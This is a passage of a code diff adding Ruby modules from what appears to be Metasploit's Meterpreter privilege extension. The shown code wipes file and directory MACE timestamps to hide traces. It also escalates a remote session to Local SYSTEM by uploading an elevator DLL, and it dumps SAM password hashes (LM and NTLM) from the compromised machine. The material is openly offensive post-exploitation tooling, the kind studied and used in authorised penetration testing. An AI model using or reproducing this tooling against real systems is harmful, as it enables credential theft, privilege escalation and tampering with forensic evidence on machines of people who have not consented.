+		request = Packet.create_request('priv_fs_blank_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		client.send_request(request)
+		true
+	end
+	#
+	# Recursively set the MACE values to the minimum threshold for the supplied
+	# directory.
+	#
+	def blank_directory_mace(dir_path)
+		request = Packet.create_request('priv_fs_blank_directory_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path)
+		client.send_request(request)
+		true
+	end
+protected
+	attr_accessor :client # :nodoc:
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/priv/passwd.rb ADDED

@@ -0,0 +1,61 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This class wraps a SAM hash entry.
+#
+###
+class SamUser
+	#
+	# Initializes the class from a hash string like this:
+	#
+	# Administrator:500:aad3b435b51404eeaadfb435b51404ee:31d6cfe0d16de931b73c59d7e0c089c0:::
+	#
+	def initialize(hash_str)
+		self.user_name, self.user_id, self.lanman, self.ntlm = hash_str.split(/:/)
+		self.hash_string = hash_str
+	end
+	#
+	# Returns the hash string that was supplied to the constructor.
+	#
+	def to_s
+		hash_string
+	end
+	#
+	# The raw hash string that was passed to the class constructor.
+	#
+	attr_reader :hash_string
+	#
+	# The username from the SAM database entry.
+	#
+	attr_reader :user_name
+	#
+	# The user's unique identifier from the SAM database.
+	#
+	attr_reader :user_id
+	#
+	# The LM hash.
+	#
+	attr_reader :lanman
+	#
+	# The NTLM hash.
+	#
+	attr_reader :ntlm
+protected
+	attr_writer :hash_string, :user_name, :user_id, :lanman, :ntlm # :nodoc:
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/priv/priv.rb ADDED

@@ -0,0 +1,104 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/priv/tlv'
+require 'rex/post/meterpreter/extensions/priv/passwd'
+require 'rex/post/meterpreter/extensions/priv/fs'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This meterpreter extensions a privilege escalation interface that is capable
+# of doing things like dumping password hashes and performing local
+# exploitation.
+#
+###
+class Priv < Extension
+	#
+	# Initializes the privilege escalationextension.
+	#
+	def initialize(client)
+		super(client, 'priv')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'priv',
+					'ext'  => self
+				},
+			])
+		# Initialize sub-classes
+		self.fs = Fs.new(client)
+	end
+	#
+	# Attempt to elevate the meterpreter to Local SYSTEM
+	#
+	def getsystem( technique=0 )
+		request = Packet.create_request( 'priv_elevate_getsystem' )
+		elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+		if( client.platform == 'x64/win64' )
+			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
+		else
+			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
+		end
+		elevator_path = ::File.expand_path( elevator_path )
+		elevator_data = ""
+		::File.open( elevator_path, "rb" ) { |f|
+			elevator_data += f.read( f.stat.size )
+		}
+		request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
+		# as some service routines can be slow we bump up the timeout to 90 seconds
+		response = client.send_request( request, 90 )
+		technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
+		if( response.result == 0 and technique != nil )
+			client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+			client.sys.config.getprivs
+			return [ true, technique ]
+		end
+		return [ false, 0 ]
+	end
+	#
+	# Returns an array of SAM hashes from the remote machine.
+	#
+	def sam_hashes
+		response = client.send_request(
+			Packet.create_request('priv_passwd_get_sam_hashes'))
+		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
+			SamUser.new(hash)
+		}
+	end
+	#
+	# Modifying privileged file system attributes.
+	#
+	attr_reader :fs
+protected
+	attr_writer :fs # :nodoc:
+end
+end; end; end; end; end